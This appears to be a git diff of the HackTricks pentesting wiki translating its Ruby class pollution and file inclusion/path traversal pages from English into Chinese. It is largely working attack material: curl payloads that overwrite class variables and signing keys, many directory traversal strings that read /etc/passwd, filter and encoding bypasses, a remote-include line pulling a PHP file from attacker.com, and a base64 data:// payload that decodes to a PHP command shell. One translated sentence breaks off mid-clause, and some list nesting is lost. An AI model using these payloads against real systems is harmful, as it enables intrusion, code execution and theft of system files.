+1. **权限提升**: `authorize` 方法检查 `to_s` 是否返回 "Admin." 通过 JSON 注入一个新的 `to_s` 属性，攻击者可以使 `to_s` 方法返回 "Admin"，从而获得未授权的权限。
+2. **远程代码执行**: 在 `health_check` 中，`instance_eval` 执行 `protected_methods` 中列出的方法。如果攻击者注入自定义方法名（如 `"puts 1"`），`instance_eval` 将执行它，导致 **远程代码执行 (RCE)**。
+1. 这仅仅是因为存在一个 **脆弱的 `eval` 指令** 执行该属性的字符串值。
+3. **影响限制**: 该漏洞仅影响单个实例，其他 `User` 和 `Admin` 实例不受影响，从而限制了利用的范围。
 
-1. **Privilege Escalation**: The `authorize` method checks if `to_s` returns "Admin." By injecting a new `to_s` attribute through JSON, an attacker can make the `to_s` method return "Admin," granting unauthorized privileges.
-2. **Remote Code Execution**: In `health_check`, `instance_eval` executes methods listed in `protected_methods`. If an attacker injects custom method names (like `"puts 1"`), `instance_eval` will execute it, leading to **remote code execution (RCE)**.
-   1. This is only possible because there is a **vulnerable `eval` instruction** executing the string value of that attribute.
-3. **Impact Limitation**: This vulnerability only affects individual instances, leaving other instances of `User` and `Admin` unaffected, thus limiting the scope of exploitation.
+### 现实案例 <a href="#real-world-cases" id="real-world-cases"></a>
 
-### Real-World Cases <a href="#real-world-cases" id="real-world-cases"></a>
-
-### ActiveSupport’s `deep_merge`
-
-This isn't vulnerable by default but can be made vulnerable with something like:&#x20;
+### ActiveSupport 的 `deep_merge`
 
+这默认情况下并不脆弱，但可以通过类似的方式使其脆弱:&#x20;
 ```ruby
 # Method to merge additional data into the object using ActiveSupport deep_merge
 def merge_with(other_object)
-  merged_hash = to_h.deep_merge(other_object)
+merged_hash = to_h.deep_merge(other_object)
 
-  merged_hash.each do |key, value|
-    self.class.attr_accessor key
-    instance_variable_set("@#{key}", value)
-  end
+merged_hash.each do |key, value|
+self.class.attr_accessor key
+instance_variable_set("@#{key}", value)
+end
 
-  self
+self
 end
 ```
+### Hashie的 `deep_merge`
 
-### Hashie’s `deep_merge`
+Hashie的 `deep_merge` 方法直接作用于对象属性，而不是普通哈希。它**防止在合并时用属性替换方法**，但有一些**例外**：以 `_`、`!` 或 `?` 结尾的属性仍然可以合并到对象中。
 
-Hashie’s `deep_merge` method operates directly on object attributes rather than plain hashes. It **prevents replacement of methods** with attributes in a merge with some **exceptions**: attributes that end with `_`, `!`, or `?` can still be merged into the object.
-
-Some special case is the attribute **`_`** on its own. Just `_` is an attribute that usually returns a `Mash` object. And because it's part of the **exceptions**, it's possible to modify it.
-
-Check the following example how passing `{"_": "Admin"}` one is able to bypass `_.to_s == "Admin"`:
+一个特殊情况是属性 **`_`** 本身。仅仅 `_` 是一个通常返回 `Mash` 对象的属性。由于它是**例外**的一部分，因此可以对其进行修改。
 
+查看以下示例，如何通过传递 `{"_": "Admin"}` 来绕过 `_.to_s == "Admin"`：
 ```ruby
 require 'json'
 require 'hashie'
@@ -185,77 +180,75 @@ require 'hashie'
 # Base class for both Admin and Regular users
 class Person < Hashie::Mash
 
-  # Method to merge additional data into the object using hashie
-  def merge_with(other_object)
-    deep_merge!(other_object)
-    self
-  end
+# Method to merge additional data into the object using hashie
+def merge_with(other_object)
+deep_merge!(other_object)
+self
+end
 
-  # Authorize based on to_s
-  def authorize
-    if _.to_s == "Admin"
-      puts "Access granted: #{@name} is an admin."
-    else
-      puts "Access denied: #{@name} is not an admin."
-    end
-  end
+# Authorize based on to_s
+def authorize
+if _.to_s == "Admin"
+puts "Access granted: #{@name} is an admin."
+else
+puts "Access denied: #{@name} is not an admin."
+end
+end
 
 end
 
 # Admin class inherits from Person
 class Admin < Person
-  def to_s
-    "Admin"
-  end
+def to_s
+"Admin"
+end
 end
 
 # Regular user class inherits from Person
 class User < Person
-  def to_s
-    "User"
-  end
+def to_s
+"User"
+end
 end
 
 class JSONMergerApp
-  def self.run(json_input)
-    additional_object = JSON.parse(json_input)
+def self.run(json_input)
+additional_object = JSON.parse(json_input)
 
-    # Instantiate a regular user
-    user = User.new({
-      name: "John Doe",
-      age: 30,
-      details: {
-        "occupation" => "Engineer",
-        "location" => {
-          "city" => "Madrid",
-          "country" => "Spain"
-        }
-      }
-    })
+# Instantiate a regular user
+user = User.new({
+name: "John Doe",
+age: 30,
+details: {
+"occupation" => "Engineer",
+"location" => {
+"city" => "Madrid",
+"country" => "Spain"
+}
+}
+})
 
-    # Perform a deep merge, which could override methods
-    user.merge_with(additional_object)
+# Perform a deep merge, which could override methods
+user.merge_with(additional_object)
 
-    # Authorize the user (privilege escalation vulnerability)
-    # Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
-    # Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
-    user.authorize
-  end
+# Authorize the user (privilege escalation vulnerability)
+# Exploit: If we pass {"_": "Admin"} in the JSON, the user will be treated as an admin.
+# Example usage: ruby hashie.rb '{"_": "Admin", "name":"Jane Doe","details":{"location":{"city":"Barcelona"}}}'
+user.authorize
+end
 end
 
 if ARGV.length != 1
-  puts "Usage: ruby hashie.rb 'JSON_STRING'"
-  exit
+puts "Usage: ruby hashie.rb 'JSON_STRING'"
+exit
 end
 
 json_input = ARGV[0]
 JSONMergerApp.run(json_input)
 ```
+## 污染类 <a href="#escaping-the-object-to-poison-the-class" id="escaping-the-object-to-poison-the-class"></a>
 
-## Poison the Classes <a href="#escaping-the-object-to-poison-the-class" id="escaping-the-object-to-poison-the-class"></a>
-
-In the following example it's possible to find the class **`Person`**, and the the clases **`Admin`** and **`Regular`** which inherits from the **`Person`** class. It also has another class called **`KeySigner`**:
-
+在以下示例中，可以找到类 **`Person`**，以及继承自 **`Person`** 类的类 **`Admin`** 和 **`Regular`**。它还有另一个名为 **`KeySigner`** 的类：
 ```ruby
 require 'json'
 require 'sinatra/base'
@@ -263,158 +256,152 @@ require 'net/http'
 
 # Base class for both Admin and Regular users
 class Person
-  @@url = "http://default-url.com"
+@@url = "http://default-url.com"
 
-  attr_accessor :name, :age, :details
+attr_accessor :name, :age, :details
 
-  def initialize(name:, age:, details:)
-    @name = name
-    @age = age
-    @details = details
-  end
+def initialize(name:, age:, details:)
+@name = name
+@age = age
+@details = details
+end
 
-  def self.url
-    @@url
-  end
+def self.url
+@@url
+end
 
-  # Method to merge additional data into the object
-  def merge_with(additional)
-    recursive_merge(self, additional)
-  end
+# Method to merge additional data into the object
+def merge_with(additional)
+recursive_merge(self, additional)
+end
 
-  private
+private
 
-  # Recursive merge to modify instance variables
-  def recursive_merge(original, additional, current_obj = original)
-    additional.each do |key, value|
-      if value.is_a?(Hash)
-        if current_obj.respond_to?(key)
-          next_obj = current_obj.public_send(key)
-          recursive_merge(original, value, next_obj)
-        else
-          new_object = Object.new
-          current_obj.instance_variable_set("@#{key}", new_object)
-          current_obj.singleton_class.attr_accessor key
-        end
-      else
-        current_obj.instance_variable_set("@#{key}", value)
-        current_obj.singleton_class.attr_accessor key
-      end
-    end
-    original
-  end
+# Recursive merge to modify instance variables
+def recursive_merge(original, additional, current_obj = original)
+additional.each do |key, value|
+if value.is_a?(Hash)
+if current_obj.respond_to?(key)
+next_obj = current_obj.public_send(key)
+recursive_merge(original, value, next_obj)
+else
+new_object = Object.new
+current_obj.instance_variable_set("@#{key}", new_object)
+current_obj.singleton_class.attr_accessor key
+end
+else
+current_obj.instance_variable_set("@#{key}", value)
+current_obj.singleton_class.attr_accessor key
+end
+end
+original
+end
 end
 
 class User < Person
-  def initialize(name:, age:, details:)
-    super(name: name, age: age, details: details)
-  end
+def initialize(name:, age:, details:)
+super(name: name, age: age, details: details)
+end
 end
 
 # A class created to simulate signing with a key, to be infected with the third gadget
 class KeySigner
-  @@signing_key = "default-signing-key"
+@@signing_key = "default-signing-key"
 
-  def self.signing_key
-    @@signing_key
-  end
+def self.signing_key
+@@signing_key
+end
 
-  def sign(signing_key, data)
-    "#{data}-signed-with-#{signing_key}"
-  end
+def sign(signing_key, data)
+"#{data}-signed-with-#{signing_key}"
+end
 end
 
 class JSONMergerApp < Sinatra::Base
-  # POST /merge - Infects class variables using JSON input
-  post '/merge' do
-    content_type :json
-    json_input = JSON.parse(request.body.read)
+# POST /merge - Infects class variables using JSON input
+post '/merge' do
+content_type :json
+json_input = JSON.parse(request.body.read)
 
-    user = User.new(
-      name: "John Doe",
-      age: 30,
-      details: {
-        "occupation" => "Engineer",
-        "location" => {
-          "city" => "Madrid",
-          "country" => "Spain"
-        }
-      }
-    )
+user = User.new(
+name: "John Doe",
+age: 30,
+details: {
+"occupation" => "Engineer",
+"location" => {
+"city" => "Madrid",
+"country" => "Spain"
+}
+}
+)
 
-    user.merge_with(json_input)
+user.merge_with(json_input)
 
-    { status: 'merged' }.to_json
-  end
+{ status: 'merged' }.to_json
+end
 
-  # GET /launch-curl-command - Activates the first gadget
-  get '/launch-curl-command' do
-    content_type :json
+# GET /launch-curl-command - Activates the first gadget
+get '/launch-curl-command' do
+content_type :json
 
-    # This gadget makes an HTTP request to the URL stored in the User class
-    if Person.respond_to?(:url)
-      url = Person.url
-      response = Net::HTTP.get_response(URI(url))
-      { status: 'HTTP request made', url: url, response_body: response.body }.to_json
-    else
-      { status: 'Failed to access URL variable' }.to_json
-    end
-  end
+# This gadget makes an HTTP request to the URL stored in the User class
+if Person.respond_to?(:url)
+url = Person.url
+response = Net::HTTP.get_response(URI(url))
+{ status: 'HTTP request made', url: url, response_body: response.body }.to_json
+else
+{ status: 'Failed to access URL variable' }.to_json
+end
+end
 
-  # Curl command to infect User class URL:
-  # curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge
+# Curl command to infect User class URL:
+# curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://example.com"}}}' http://localhost:4567/merge
 
-  # GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
-  get '/sign_with_subclass_key' do
-    content_type :json
+# GET /sign_with_subclass_key - Signs data using the signing key stored in KeySigner
+get '/sign_with_subclass_key' do
+content_type :json
 
-    # This gadget signs data using the signing key stored in KeySigner class
-    signer = KeySigner.new
-    signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")
+# This gadget signs data using the signing key stored in KeySigner class
+signer = KeySigner.new
+signed_data = signer.sign(KeySigner.signing_key, "data-to-sign")
 
-    { status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json
-  end
+{ status: 'Data signed', signing_key: KeySigner.signing_key, signed_data: signed_data }.to_json
+end
 
-  # Curl command to infect KeySigner signing key (run in a loop until successful):
-  # for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done
+# Curl command to infect KeySigner signing key (run in a loop until successful):
+# for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge; done
 
-  # GET /check-infected-vars - Check if all variables have been infected
-  get '/check-infected-vars' do
-    content_type :json
+# GET /check-infected-vars - Check if all variables have been infected
+get '/check-infected-vars' do
+content_type :json
 
-    {
-      user_url: Person.url,
-      signing_key: KeySigner.signing_key
-    }.to_json
-  end
+{
+user_url: Person.url,
+signing_key: KeySigner.signing_key
+}.to_json
+end
 
-  run! if app_file == $0
+run! if app_file == $0
 end
 ```
+### 毒化父类
 
-### Poison Parent Class
-
-With this payload:
-
+使用此有效负载：
 ```bash
 curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"url":"http://malicious.com"}}}' http://localhost:4567/merge
 ```
+可以修改父类 **`Person`** 的 **`@@url`** 属性的值。
 
-It's possible to modify the value of the **`@@url`** attribute of the parent class **`Person`**.
-
-### **Poisoning Other Classes**
-
-With this payload:
+### **污染其他类**
 
+使用这个有效载荷：
 ```bash
 for i in {1..1000}; do curl -X POST -H "Content-Type: application/json" -d '{"class":{"superclass":{"superclass":{"subclasses":{"sample":{"signing_key":"injected-signing-key"}}}}}}' http://localhost:4567/merge --silent > /dev/null; done
 ```
-
-It's possible to brute-force the defined classes and at some point poison the class **`KeySigner`** modifying the value of `signing_key` by `injected-signing-key`.\
+可以通过暴力破解定义的类，并在某些时候污染类 **`KeySigner`**，通过 `injected-signing-key` 修改 `signing_key` 的值。
 
 ## References
 
 - [https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html](https://blog.doyensec.com/2024/10/02/class-pollution-ruby.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md
index 544e2fefd..846464777 100644
--- a/src/pentesting-web/file-inclusion/README.md
+++ b/src/pentesting-web/file-inclusion/README.md
@@ -1,149 +1,130 @@
-# File Inclusion/Path traversal
+# 文件包含/路径遍历
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="../../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客见解**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+了解最新的漏洞赏金发布和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶级黑客合作！
 
-## File Inclusion
+## 文件包含
 
-**Remote File Inclusion (RFI):** The file is loaded from a remote server (Best: You can write the code and the server will execute it). In php this is **disabled** by default (**allow_url_include**).\
-**Local File Inclusion (LFI):** The sever loads a local file.
+**远程文件包含 (RFI)：** 文件从远程服务器加载（最佳：您可以编写代码，服务器将执行它）。在 php 中，默认情况下是 **禁用** 的 (**allow_url_include**)。\
+**本地文件包含 (LFI)：** 服务器加载本地文件。
 
-The vulnerability occurs when the user can control in some way the file that is going to be load by the server.
+当用户以某种方式控制将要被服务器加载的文件时，就会发生漏洞。
 
-Vulnerable **PHP functions**: require, require_once, include, include_once
+易受攻击的 **PHP 函数**：require, require_once, include, include_once
 
-A interesting tool to exploit this vulnerability: [https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
-
-## Blind - Interesting - LFI2RCE files
+一个有趣的工具来利用这个漏洞：[https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
 
+## Blind - Interesting - LFI2RCE 文件
 ```python
 wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ
 ```
-
 ### **Linux**
 
-**Mixing several \*nix LFI lists and adding more paths I have created this one:**
+**混合多个 \*nix LFI 列表并添加更多路径，我创建了这个：**
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %}
 
-Try also to change `/` for `\`\
-Try also to add `../../../../../`
+尝试将 `/` 改为 `\`\
+尝试添加 `../../../../../`
 
-A list that uses several techniques to find the file /etc/password (to check if the vulnerability exists) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
+一个使用多种技术查找文件 /etc/password（以检查漏洞是否存在）的列表可以在 [这里](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt) 找到。
 
 ### **Windows**
 
-Merge of different wordlists:
+不同词表的合并：
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %}
 
-Try also to change `/` for `\`\
-Try also to remove `C:/` and add `../../../../../`
+尝试将 `/` 改为 `\`\
+尝试删除 `C:/` 并添加 `../../../../../`
 
-A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
+一个使用多种技术查找文件 /boot.ini（以检查漏洞是否存在）的列表可以在 [这里](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt) 找到。
 
 ### **OS X**
 
-Check the LFI list of linux.
+检查 Linux 的 LFI 列表。
 
-## Basic LFI and bypasses
-
-All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also (page=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)/>).
+## 基本 LFI 和绕过
 
+所有示例都是针对本地文件包含的，但也可以应用于远程文件包含（页面=[http://myserver.com/phpshellcode.txt\\](<http://myserver.com/phpshellcode.txt)/）。
 ```
 http://example.com/index.php?page=../../../etc/passwd
 ```
-
-### traversal sequences stripped non-recursively
-
+### 非递归剥离遍历序列
 ```python
 http://example.com/index.php?page=....//....//....//etc/passwd
 http://example.com/index.php?page=....\/....\/....\/etc/passwd
 http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
 ```
+### **空字节 (%00)**
 
-### **Null byte (%00)**
-
-Bypass the append more chars at the end of the provided string (bypass of: $\_GET\['param']."php")
-
+绕过在提供的字符串末尾附加更多字符（绕过：$\_GET\['param']."php")
 ```
 http://example.com/index.php?page=../../../etc/passwd%00
 ```
+这是**自 PHP 5.4 起已解决**
 
-This is **solved since PHP 5.4**
-
-### **Encoding**
-
-You could use non-standard encondings like double URL encode (and others):
+### **编码**
 
+您可以使用非标准编码，例如双重 URL 编码（和其他编码）：
 ```
 http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
 http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 ```
+### 从现有文件夹
 
-### From existent folder
-
-Maybe the back-end is checking the folder path:
-
+也许后端正在检查文件夹路径：
 ```python
 http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
 ```
+### 探索服务器上的文件系统目录
 
-### Exploring File System Directories on a Server
-
-The file system of a server can be explored recursively to identify directories, not just files, by employing certain techniques. This process involves determining the directory depth and probing for the existence of specific folders. Below is a detailed method to achieve this:
-
-1. **Determine Directory Depth:** Ascertain the depth of your current directory by successfully fetching the `/etc/passwd` file (applicable if the server is Linux-based). An example URL might be structured as follows, indicating a depth of three:
+服务器的文件系统可以通过某些技术递归地进行探索，以识别目录，而不仅仅是文件。此过程涉及确定目录深度并探测特定文件夹的存在。以下是实现此目的的详细方法：
 
+1. **确定目录深度：** 通过成功获取 `/etc/passwd` 文件来确定当前目录的深度（适用于基于Linux的服务器）。一个示例URL可能结构如下，指示深度为三：
 ```bash
 http://example.com/index.php?page=../../../etc/passwd # depth of 3
 ```
-
-2. **Probe for Folders:** Append the name of the suspected folder (e.g., `private`) to the URL, then navigate back to `/etc/passwd`. The additional directory level requires incrementing the depth by one:
-
+2. **探测文件夹：** 将怀疑的文件夹名称（例如，`private`）附加到 URL，然后导航回 `/etc/passwd`。额外的目录级别需要将深度
 ```bash
 http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
 ```
+3. **解释结果：** 服务器的响应指示文件夹是否存在：
+- **错误 / 无输出：** 文件夹 `private` 可能在指定位置不存在。
+- **`/etc/passwd` 的内容：** 确认存在 `private` 文件夹。
+4. **递归探索：** 发现的文件夹可以使用相同的技术或传统的本地文件包含 (LFI) 方法进一步探测子目录或文件。
 
-3. **Interpret the Outcomes:** The server's response indicates whether the folder exists:
-   - **Error / No Output:** The folder `private` likely does not exist at the specified location.
-   - **Contents of `/etc/passwd`:** The presence of the `private` folder is confirmed.
-4. **Recursive Exploration:** Discovered folders can be further probed for subdirectories or files using the same technique or traditional Local File Inclusion (LFI) methods.
-
-For exploring directories at different locations in the file system, adjust the payload accordingly. For instance, to check if `/var/www/` contains a `private` directory (assuming the current directory is at a depth of 3), use:
-
+要探索文件系统中不同位置的目录，请相应调整有效载荷。例如，要检查 `/var/www/` 是否包含 `private` 目录（假设当前目录深度为 3），请使用：
 ```bash
 http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
 ```
+### **路径截断技术**
 
-### **Path Truncation Technique**
+路径截断是一种用于操纵Web应用程序中文件路径的方法。它通常用于通过绕过某些安全措施来访问受限文件，这些安全措施会在文件路径的末尾附加额外字符。目标是构造一个文件路径，该路径在被安全措施修改后，仍然指向所需的文件。
 
-Path truncation is a method employed to manipulate file paths in web applications. It's often used to access restricted files by bypassing certain security measures that append additional characters to the end of file paths. The goal is to craft a file path that, once altered by the security measure, still points to the desired file.
+在PHP中，由于文件系统的性质，文件路径的各种表示可以被视为等效。例如：
 
-In PHP, various representations of a file path can be considered equivalent due to the nature of the file system. For instance:
-
-- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, and `/etc/passwd/` are all treated as the same path.
-- When the last 6 characters are `passwd`, appending a `/` (making it `passwd/`) doesn't change the targeted file.
-- Similarly, if `.php` is appended to a file path (like `shellcode.php`), adding a `/.` at the end will not alter the file being accessed.
-
-The provided examples demonstrate how to utilize path truncation to access `/etc/passwd`, a common target due to its sensitive content (user account information):
+- `/etc/passwd`、`/etc//passwd`、`/etc/./passwd`和`/etc/passwd/`都被视为相同的路径。
+- 当最后6个字符是`passwd`时，附加一个`/`（使其变为`passwd/`）不会改变目标文件。
+- 同样，如果在文件路径后附加`.php`（如`shellcode.php`），在末尾添加`/.`不会改变被访问的文件。
 
+提供的示例演示了如何利用路径截断访问`/etc/passwd`，这是一个由于其敏感内容（用户账户信息）而常见的目标：
 ```
 http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
 http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
@@ -153,19 +134,17 @@ http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[
 http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
 http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
 ```
+在这些场景中，所需的遍历次数可能在2027左右，但这个数字可能会根据服务器的配置而有所不同。
 
-In these scenarios, the number of traversals needed might be around 2027, but this number can vary based on the server's configuration.
+- **使用点段和附加字符**：遍历序列（`../`）与额外的点段和字符结合使用，可以用来导航文件系统，有效地忽略服务器附加的字符串。
+- **确定所需的遍历次数**：通过反复试验，可以找到导航到根目录所需的精确`../`序列数量，然后再到`/etc/passwd`，确保任何附加的字符串（如`.php`）被中和，但所需的路径（`/etc/passwd`）保持不变。
+- **从虚假目录开始**：通常的做法是以一个不存在的目录（如`a/`）开始路径。这种技术作为预防措施或满足服务器路径解析逻辑的要求。
 
-- **Using Dot Segments and Additional Characters**: Traversal sequences (`../`) combined with extra dot segments and characters can be used to navigate the file system, effectively ignoring appended strings by the server.
-- **Determining the Required Number of Traversals**: Through trial and error, one can find the precise number of `../` sequences needed to navigate to the root directory and then to `/etc/passwd`, ensuring that any appended strings (like `.php`) are neutralized but the desired path (`/etc/passwd`) remains intact.
-- **Starting with a Fake Directory**: It's a common practice to begin the path with a non-existent directory (like `a/`). This technique is used as a precautionary measure or to fulfill the requirements of the server's path parsing logic.
+在使用路径截断技术时，了解服务器的路径解析行为和文件系统结构至关重要。每种情况可能需要不同的方法，通常需要测试以找到最有效的方法。
 
-When employing path truncation techniques, it's crucial to understand the server's path parsing behavior and filesystem structure. Each scenario might require a different approach, and testing is often necessary to find the most effective method.
-
-**This vulnerability was corrected in PHP 5.3.**
-
-### **Filter bypass tricks**
+**此漏洞在PHP 5.3中已被修复。**
 
+### **过滤器绕过技巧**
 ```
 http://example.com/index.php?page=....//....//etc/passwd
 http://example.com/index.php?page=..///////..////..//////etc/passwd
@@ -173,59 +152,47 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
 Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
 http://example.com/index.php?page=PhP://filter
 ```
+## 远程文件包含
 
-## Remote File Inclusion
-
-In php this is disable by default because **`allow_url_include`** is **Off.** It must be **On** for it to work, and in that case you could include a PHP file from your server and get RCE:
-
+在 php 中，这默认是禁用的，因为 **`allow_url_include`** 是 **关闭** 的。它必须是 **开启** 的才能工作，在这种情况下，你可以从你的服务器包含一个 PHP 文件并获得 RCE：
 ```python
 http://example.com/index.php?page=http://atacker.com/mal.php
 http://example.com/index.php?page=\\attacker.com\shared\mal.php
 ```
-
-If for some reason **`allow_url_include`** is **On**, but PHP is **filtering** access to external webpages, [according to this post](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), you could use for example the data protocol with base64 to decode a b64 PHP code and egt RCE:
-
+如果由于某种原因 **`allow_url_include`** 是 **开启** 的，但 PHP 正在 **过滤** 对外部网页的访问，[根据这篇文章](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/)，你可以使用例如数据协议和 base64 来解码一个 b64 PHP 代码并获得 RCE：
 ```
 PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
 ```
-
 > [!NOTE]
-> In the previous code, the final `+.txt` was added because the attacker needed a string that ended in `.txt`, so the string ends with it and after the b64 decode that part will return just junk and the real PHP code will be included (and therefore, executed).
-
-Another example **not using the `php://` protocol** would be:
+> 在之前的代码中，最后的 `+.txt` 被添加是因为攻击者需要一个以 `.txt` 结尾的字符串，因此字符串以它结尾，经过 b64 解码后那部分将返回垃圾数据，真正的 PHP 代码将被包含（因此被执行）。
 
+另一个**不使用 `php://` 协议**的例子是：
 ```
 data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
 ```
+## Python 根元素
 
-## Python Root element
-
-In python in a code like this one:
-
+在 Python 中，像这样的代码：
 ```python
 # file_name is controlled by a user
 os.path.join(os.getcwd(), "public", file_name)
 ```
-
-If the user passes an **absolute path** to **`file_name`**, the **previous path is just removed**:
-
+如果用户传递一个 **绝对路径** 给 **`file_name`**，那么 **之前的路径将被移除**：
 ```python
 os.path.join(os.getcwd(), "public", "/etc/passwd")
 '/etc/passwd'
 ```
+根据[文档](https://docs.python.org/3.10/library/os.path.html#os.path.join)，这是预期的行为：
 
-It is the intended behaviour according to [the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join):
+> 如果一个组件是绝对路径，则所有先前的组件都会被丢弃，并从绝对路径组件继续连接。
 
-> If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.
+## Java 列出目录
 
-## Java List Directories
+看起来如果你在 Java 中有路径遍历并且你**请求一个目录**而不是文件，**将返回该目录的列表**。在其他语言中不会发生这种情况（据我所知）。
 
-It looks like if you have a Path Traversal in Java and you **ask for a directory** instead of a file, a **listing of the directory is returned**. This won't be happening in other languages (afaik).
-
-## Top 25 parameters
-
-Here’s list of top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from [link](https://twitter.com/trbughunters/status/1279768631845494787)):
+## 前25个参数
 
+以下是可能容易受到本地文件包含（LFI）漏洞影响的前25个参数列表（来自[链接](https://twitter.com/trbughunters/status/1279768631845494787)）：
 ```
 ?cat={payload}
 ?dir={payload}
@@ -253,41 +220,39 @@ Here’s list of top 25 parameters that could be vulnerable to local file inclus
 ?mod={payload}
 ?conf={payload}
 ```
-
-## LFI / RFI using PHP wrappers & protocols
+## LFI / RFI 使用 PHP 包装器和协议
 
 ### php://filter
 
-PHP filters allow perform basic **modification operations on the data** before being it's read or written. There are 5 categories of filters:
+PHP 过滤器允许在数据被读取或写入之前执行基本的 **修改操作**。过滤器分为 5 类：
 
 - [String Filters](https://www.php.net/manual/en/filters.string.php):
-  - `string.rot13`
-  - `string.toupper`
-  - `string.tolower`
-  - `string.strip_tags`: Remove tags from the data (everything between "<" and ">" chars)
-    - Note that this filter has disappear from the modern versions of PHP
+- `string.rot13`
+- `string.toupper`
+- `string.tolower`
+- `string.strip_tags`: 从数据中移除标签（在 "<" 和 ">" 字符之间的所有内容）
+- 请注意，这个过滤器在现代版本的 PHP 中已经消失
 - [Conversion Filters](https://www.php.net/manual/en/filters.convert.php)
-  - `convert.base64-encode`
-  - `convert.base64-decode`
-  - `convert.quoted-printable-encode`
-  - `convert.quoted-printable-decode`
-  - `convert.iconv.*` : Transforms to a different encoding(`convert.iconv.<input_enc>.<output_enc>`) . To get the **list of all the encodings** supported run in the console: `iconv -l`
+- `convert.base64-encode`
+- `convert.base64-decode`
+- `convert.quoted-printable-encode`
+- `convert.quoted-printable-decode`
+- `convert.iconv.*` : 转换为不同的编码(`convert.iconv.<input_enc>.<output_enc>`)。要获取 **所有支持的编码** 列表，请在控制台中运行：`iconv -l`
 
 > [!WARNING]
-> Abusing the `convert.iconv.*` conversion filter you can **generate arbitrary text**, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
+> 滥用 `convert.iconv.*` 转换过滤器可以 **生成任意文本**，这可能对编写任意文本或使函数如 include 处理任意文本有用。有关更多信息，请查看 [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md)。
 
 - [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
-  - `zlib.deflate`: Compress the content (useful if exfiltrating a lot of info)
